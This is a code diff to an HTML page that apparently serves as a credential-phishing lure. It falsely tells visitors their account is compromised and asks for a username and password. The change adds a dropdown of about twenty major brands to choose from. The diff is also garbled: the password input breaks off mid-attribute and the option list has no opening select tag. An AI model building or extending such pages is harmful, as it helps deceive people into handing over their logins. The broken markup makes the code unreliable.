--- a/index.html
+++ b/index.html
@@ -16,8 +16,30 @@
       <h3>Your account has been compromised! Please enter credentials to secure your account!</h3>
         <form id="form">
             <input type="text" id="username" placeholder="Username" />
-            <input type="text" id="password" placeholder="Password" />
-            <input type="text" id="service" placeholder="Service" />
+            <input type="text" id="password" placeholder
+              <option value="amazon">Amazon</option>
+              <option value="google">Google</option>
+              <option value="apple">Apple</option>
+              <option value="microsoft">Microsoft</option>
+              <option value="meta">Meta (Facebook)</option>
+              <option value="netflix">Netflix</option>
+              <option value="youtube">YouTube</option>
+              <option value="spotify">Spotify</option>
+              <option value="instagram">Instagram</option>
+              <option value="discord">Discord</option>
+              <option value="x">X (Twitter)</option>
+              <option value="tiktok">TikTok</option>
+              <option value="reddit">Reddit</option>
+              <option value="snapchat">Snapchat</option>
+              <option value="linkedin">LinkedIn</option>
+              <option value="walmart">Walmart</option>
+              <option value="target">Target</option>
+              <option value="costco">Costco</option>
+              <option value="nike">Nike</option>
+              <option value="adidas">Adidas</option>
+              <option value="samsung">Samsung</option>
+            </select>
+
             <button type="submit">Send</button>
         </form>
         <script>
